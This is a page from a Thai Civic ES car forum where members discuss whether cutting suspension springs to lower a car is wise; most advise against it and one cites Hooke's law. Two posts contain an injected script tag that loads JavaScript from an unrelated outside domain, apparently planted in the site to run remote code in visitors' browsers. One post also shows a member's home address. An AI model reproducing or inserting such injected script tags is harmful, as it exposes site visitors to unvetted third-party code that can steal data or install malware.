ตอบ
thammarong007

ชื่อเล่น: รงค์

เข้าร่วม: 23 ธันวา 2012
ตอบ: 1733

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2672
ให้คำขอบคุณ: 3437

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อาทิตย์, 5 พฤษภาคม 2013 15:43 - ตัดสปริงดีไหม
mnwka-tle พิมพ์ว่า:
thammarong007 พิมพ์ว่า:
การเลื่อนเบ้าจะทำให้ด้านหน้าเตี้ยลงจากเดิมได้อีกประมาณ 1 นิ้วโดยไม่ต้องตัดสปริงครับ แต่ถ้าจะโหลดจริงๆ แนะนำให้เปลี่ยนสปริงดีกว่านะครับ

มันเลื่อนได้แค่ข้างหน้าหรอครับ

เท่าที่ทำกันก็เลื่อนเบ้าหน้าครับ เอ่อ....ม แล้วข้างหลังมันมีเบ้ารึเปล่าหว่า <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: nooduean_69  karnmotocross01 
ณรงค์ศักดิ์

ชื่อเล่น: โอ๊ด

เข้าร่วม: 24 กรกฎา 2012
ตอบ: 131

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 110
ให้คำขอบคุณ: 0

ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 5 พฤษภาคม 2013 16:18 - ตัดสปริงดีไหม
ขอผม ตัดสปิงหน้าออก 1 นิ้ว ตอนแรก ก้อ โอเค แต่ตอนนี้ ปัญหาเริ่มมา เพราะ ตอนเลี้ยว สปิงมันไม่หมุนตามพวงมลัย แล้วมันจะมีเสียง กุ๊กกกก ครับ
ได้รับคำขอบคุณจาก: nooduean_69  karnmotocross01 
wanchalerm_civic

เข้าร่วม: 04 กันยา 2009
ตอบ: 6

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 20
ให้คำขอบคุณ: 0

ที่อยู่: 40/39 หมู่บ้าน อารีวรรณ หมู่1 ตำบลท่าช้าง อำเภอเมือง จันทบุรี 22000
ปี: 2001
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 23 มกรา 2014 00:16 - ตัดสปริงดีไหม
ใช้มาEs 01 MT ครับ 6 ปีเพิ่งรู้ว่ารถเราสปริงตัดครับ ปกติเป็นคนขับรถเร็วครับต่างจังหวัด160 upซัดมานานและ ซื้อรถต่อเค้ามา เมือ่6ปีก่อน ตอนซื้อมาใหม่ๆเดือนแรกเข้า เครปเวอร์ caver modify โคราชครับ อาการทางไม่เรียบแฉลบไปมาทั้งๆที่พวงมาลัยตรง โดนไปกองทับลูกหมาก กะโช้ค ใหม่คู่หน้า 7000 กว่าๆ เค้าไม่ได้บอกว่าสปริงตัด ขับๆไป เบรคค้าง โดนตามดอีก เปลียนร้านแถวๆหัวทะเลโคราช 2xxx จำม่ะได้ ใช้มา6ปี จนเมื่อวาน ไป Bquick เค้าบอกถึงรู้ แต่ทุกวันนี้อาการ เพียบ แล็คเกอร์ฝากระโปรงหน้าลอกหลังคาลอก  น้ำมันเครื่องซึม ซีนฝาเครื่อง หลายปีแล้ว เหยียบเส้นจราจร แฉลบ ลุยน้ำ เหลียบครัชมีเสียงเหล็กสีกัน สีลอก คอมดัง แต่ยังเย็น ช่วงล่างดังกุ๊กๆตลอด 5ปีที่ผ่านมาทำที่ไหนจบไม่นานก็มาอีก ครับตอนนี้ล่าสุดเวลาเบรคมีเสียง อ๊อดแอ๊คดังที่คาลิปเปอร์ข้างเดียว เกียร์ถอยเข้ายาก ชนหมามาด้วย 3ปีก่อนที่โค้งพิมาย แฟนขับ คานหน้ายุบ(จนทุกวันนี้) แผงจิ้งหลีดไรไม่รุ้ข้างหน้า บุบเข้าไป เพิ่งมารุ้ตอนกันชนหลุดก็เลยเห็น เมื่อปีที่แล้วกันชน ลายพร้อยแตกบ้างบางส่วน โคมดำมุมส้ม แตกลายงาไปหมดแล้วครับ ปล เพิ่งผ่อนหมด สามเดือนก่อน ใครคิดว่า es เป็นไงไม่รู้ อาการทั้งหมด ยังคงอยู่ ทุกวันนี้ก็ขับเหมือนเดิม สำหรับผมมันยิ่งกว่าคำว่าทน ค้มครับ หวังว่าซักวันมันคงกลับมาสวย ตอนที่ซื้อไม่คิดมากครับ รุ้แต่ว่ามันสายดี ชอบทรงรถ 550000 รวมดอกเบี้ย ไม่เคยติดแก๊ส ทุกวันนี้เติมน้ำมัน กระจาย แต่ก็มีความสุขดี ขอบคุณครับ ES จากใจมันพาเราไปเกือบทั่วไทยและ ว่าแต่มาพล่ามไรเนี่ยเรา อ๋อเพิ่งได้ สปริงapex มาชุดนึง เดี๋ยวจะไปลองใส่กะโช๊คเดิมดูครับ ตอนนี้โช๊คที่ใส่อยู่ก็ซื้อเค้ามา พี่เค้าบอกว่าโช๊คเดิมแต่เลือนเบ้าไรเนี่ยแหละ ตูดโด่งๆหน้าทิ่ม (เนื่องจากโช๊คเดิมแตกหมด เห็นพี่เค้าลงขายเลยไปซื้อเค้ามาใส่ไม่ได้ดูไร)ขับดียุครับแต่ไถไปเรื่อยเลย กันชนไปหมดและ ฮ่าๆ ใครเห็นบอกแต่งสวยดี แต่อยากบอก ซื้อเค้ามาใส่ไม่เคยศึกษา จะบอกใครก็อายเดี๋ยวเค้าว่าโง่ครับ เดี๋ยวไปให้พี่ใหม่ลงคาถาให้ครับ เป็นไงจะมาเหลาให้ฟังครับ
ได้รับคำขอบคุณจาก: nu_es_05  csirinant  nooduean_69  POP_ES05  karnmotocross01 
nooduean_69

ชื่อเล่น: นู๋เดือน

เข้าร่วม: 04 ตุลา 2011
ตอบ: 1224

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 3195

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 23 มกรา 2014 08:09 - ตัดสปริงดีไหม
wanchalerm_civic พิมพ์ว่า:
ใช้มาEs 01 MT ครับ 6 ปีเพิ่งรู้ว่ารถเราสปริงตัดครับ ปกติเป็นคนขับรถเร็วครับต่างจังหวัด160 upซัดมานานและ ซื้อรถต่อเค้ามา เมือ่6ปีก่อน ตอนซื้อมาใหม่ๆเดือนแรกเข้า เครปเวอร์ caver modify โคราชครับ อาการทางไม่เรียบแฉลบไปมาทั้งๆที่พวงมาลัยตรง โดนไปกองทับลูกหมาก กะโช้ค ใหม่คู่หน้า 7000 กว่าๆ เค้าไม่ได้บอกว่าสปริงตัด ขับๆไป เบรคค้าง โดนตามดอีก เปลียนร้านแถวๆหัวทะเลโคราช 2xxx จำม่ะได้ ใช้มา6ปี จนเมื่อวาน ไป Bquick เค้าบอกถึงรู้ แต่ทุกวันนี้อาการ เพียบ แล็คเกอร์ฝากระโปรงหน้าลอกหลังคาลอก  น้ำมันเครื่องซึม ซีนฝาเครื่อง หลายปีแล้ว เหยียบเส้นจราจร แฉลบ ลุยน้ำ เหลียบครัชมีเสียงเหล็กสีกัน สีลอก คอมดัง แต่ยังเย็น ช่วงล่างดังกุ๊กๆตลอด 5ปีที่ผ่านมาทำที่ไหนจบไม่นานก็มาอีก ครับตอนนี้ล่าสุดเวลาเบรคมีเสียง อ๊อดแอ๊คดังที่คาลิปเปอร์ข้างเดียว เกียร์ถอยเข้ายาก ชนหมามาด้วย 3ปีก่อนที่โค้งพิมาย แฟนขับ คานหน้ายุบ(จนทุกวันนี้) แผงจิ้งหลีดไรไม่รุ้ข้างหน้า บุบเข้าไป เพิ่งมารุ้ตอนกันชนหลุดก็เลยเห็น เมื่อปีที่แล้วกันชน ลายพร้อยแตกบ้างบางส่วน โคมดำมุมส้ม แตกลายงาไปหมดแล้วครับ ปล เพิ่งผ่อนหมด สามเดือนก่อน ใครคิดว่า es เป็นไงไม่รู้ อาการทั้งหมด ยังคงอยู่ ทุกวันนี้ก็ขับเหมือนเดิม สำหรับผมมันยิ่งกว่าคำว่าทน ค้มครับ หวังว่าซักวันมันคงกลับมาสวย ตอนที่ซื้อไม่คิดมากครับ รุ้แต่ว่ามันสายดี ชอบทรงรถ 550000 รวมดอกเบี้ย ไม่เคยติดแก๊ส ทุกวันนี้เติมน้ำมัน กระจาย แต่ก็มีความสุขดี ขอบคุณครับ ES จากใจมันพาเราไปเกือบทั่วไทยและ ว่าแต่มาพล่ามไรเนี่ยเรา อ๋อเพิ่งได้ สปริงapex มาชุดนึง เดี๋ยวจะไปลองใส่กะโช๊คเดิมดูครับ ตอนนี้โช๊คที่ใส่อยู่ก็ซื้อเค้ามา พี่เค้าบอกว่าโช๊คเดิมแต่เลือนเบ้าไรเนี่ยแหละ ตูดโด่งๆหน้าทิ่ม (เนื่องจากโช๊คเดิมแตกหมด เห็นพี่เค้าลงขายเลยไปซื้อเค้ามาใส่ไม่ได้ดูไร)ขับดียุครับแต่ไถไปเรื่อยเลย กันชนไปหมดและ ฮ่าๆ ใครเห็นบอกแต่งสวยดี แต่อยากบอก ซื้อเค้ามาใส่ไม่เคยศึกษา จะบอกใครก็อายเดี๋ยวเค้าว่าโง่ครับ เดี๋ยวไปให้พี่ใหม่ลงคาถาให้ครับ เป็นไงจะมาเหลาให้ฟังครับ

สวดยอดค่ะ
ได้รับคำขอบคุณจาก: POP_ES05  karnmotocross01 
koobe

ชื่อเล่น: นัท

เข้าร่วม: 19 มิถุนา 2010
ตอบ: 2462

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3437
ให้คำขอบคุณ: 2482

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 23 มกรา 2014 09:10 - ตัดสปริงดีไหม
หนู๋เดือน ท่อมูเก้นใบยาวๆ ของเพื่อนหนู่ขายไปยัง ตอบPMมาก็ได้นะ อ้อ//พี่มีสปริงโหลด H&R แค่ข้างหลังนะเอาป่าว ข้างหน้าใช้อยู่
ได้รับคำขอบคุณจาก: karnmotocross01 
yoyosonic

เข้าร่วม: 20 กรกฎา 2011
ตอบ: 1079

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 325
ให้คำขอบคุณ: 3432

ปี: 2002
พฤหัส, 23 มกรา 2014 10:57 - ตัดสปริงดีไหม
nooduean_69 พิมพ์ว่า:
wangyu พิมพ์ว่า:
อย่าทำครับ
เพราะว่าการตัดสปริงจะเกิดความร้อน จะทำให้ค่า K ของสปริงเปลี่ยนไป
ตอนแรกๆอาจจะใช้ได้ดี แต่ถ้าผ่านไปนานๆก็จะเห็นผลครับ
แนะนำให้ซื้อสปริงโหลดดีกว่าครับ

น้องคิดไว้อยู่แล้วง่ะ ดีนะ ที่ยัง...

ได้รับคำขอบคุณจาก: karnmotocross01 
profibus

เข้าร่วม: 16 ธันวา 2012
ตอบ: 803

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1151
ให้คำขอบคุณ: 516

สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 23 มกรา 2014 11:53 - ตัดสปริงดีไหม
ทำไมถึงไม่ให้ตัดสปริง
มาว่าด้วยหลักการทางวิทยาศาสตร์ Hook'law
F= k•x
F คือ แรงสปริง
K คือ ค่าคงที่ของ
X คือ ระยะยืดหดตัว ของสปริง

เมื่อตัดสปริง STANDRAD จากโรงงาน ที่ถูกคำนวณ ในการรับแรง ของน้ำหนักรถยนต์ มาอย่างดีแล้ว
ระยะรับแรงต่อข้อ จะเท่ากัน สมมติว่า แรงที่กระทำทั้งหมด 10 นิวตัน มีขดลวดสปริง 5 ข้อ เฉลี่ย1ข้อ สปริงจะรับน้ำหนัก 2นิวตัน
เมื่อทำการตัดสปริงออก 1ข้อ แรงที่กระทำเท่าเดิม สปริงแต่ละข้อจะเกิดการรับโหลด ทดแทนที่ถูกตัดออก คือ คือสปริงที่เหลือจะรับน้ำหนัก 2.5 นิวตันต่อข้อ ซึ่งทรงผลต่อการคืนตัวระยะยืดหรือระยะหดตัวมีประสิทธิภาพน้อยลง เมื่อใช้ไปนานๆ จะเกิดความล้าที่ตัวสปริง จนทำให้ค่า K เปลี่ยนไป

ผิดถูกประการใดขอโทษด้วยนะครับ
ได้รับคำขอบคุณจาก: karnmotocross01  tukkang  nooduean_69 
karnmotocross01

ชื่อเล่น: กานต์

เข้าร่วม: 01 กันยา 2012
ตอบ: 1477

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 814
ให้คำขอบคุณ: 34349

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 23 มกรา 2014 12:12 - ตัดสปริงดีไหม
คงตัดสินใจได้แล้วนะครับ...
tukkang

ชื่อเล่น: เก้ง

เข้าร่วม: 19 ธันวา 2012
ตอบ: 152

ได้รับคำขอบคุณ: 139
ให้คำขอบคุณ: 736

สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 23 มกรา 2014 12:18 - ตัดสปริงดีไหม
profibus พิมพ์ว่า:
ทำไมถึงไม่ให้ตัดสปริง
มาว่าด้วยหลักการทางวิทยาศาสตร์ Hook'law
F= k•x
F คือ แรงสปริง
K คือ ค่าคงที่ของ
X คือ ระยะยืดหดตัว ของสปริง

เมื่อตัดสปริง STANDRAD จากโรงงาน ที่ถูกคำนวณ ในการรับแรง ของน้ำหนักรถยนต์ มาอย่างดีแล้ว
ระยะรับแรงต่อข้อ จะเท่ากัน สมมติว่า แรงที่กระทำทั้งหมด 10 นิวตัน มีขดลวดสปริง 5 ข้อ เฉลี่ย1ข้อ สปริงจะรับน้ำหนัก 2นิวตัน
เมื่อทำการตัดสปริงออก 1ข้อ แรงที่กระทำเท่าเดิม สปริงแต่ละข้อจะเกิดการรับโหลด ทดแทนที่ถูกตัดออก คือ คือสปริงที่เหลือจะรับน้ำหนัก 2.5 นิวตันต่อข้อ ซึ่งทรงผลต่อการคืนตัวระยะยืดหรือระยะหดตัวมีประสิทธิภาพน้อยลง เมื่อใช้ไปนานๆ จะเกิดความล้าที่ตัวสปริง จนทำให้ค่า K เปลี่ยนไป

ผิดถูกประการใดขอโทษด้วยนะครับ

+1  นักฟิสิกส์ มาเองเลย
P.TER.357

เข้าร่วม: 06 มีนา 2010
ตอบ: 968

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 784
ให้คำขอบคุณ: 2902

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 23 มกรา 2014 20:24 - ตัดสปริงดีไหม
+1 ไม่ควรตัดครับ

kkw

ชื่อเล่น: โต้ง

เข้าร่วม: 16 กันยา 2012
ตอบ: 459

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 475
ให้คำขอบคุณ: 794

สี: แดง แรลไล (R-513)
ศุกร์, 24 มกรา 2014 11:00 - ตัดสปริงดีไหม
อย่าเลยครับ ไม่เกินหกเดือนอยากถอดแน่ๆ"<script src="https://sport32news.com/civicesgroup.js">  
ตอบ
หน้า 2 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.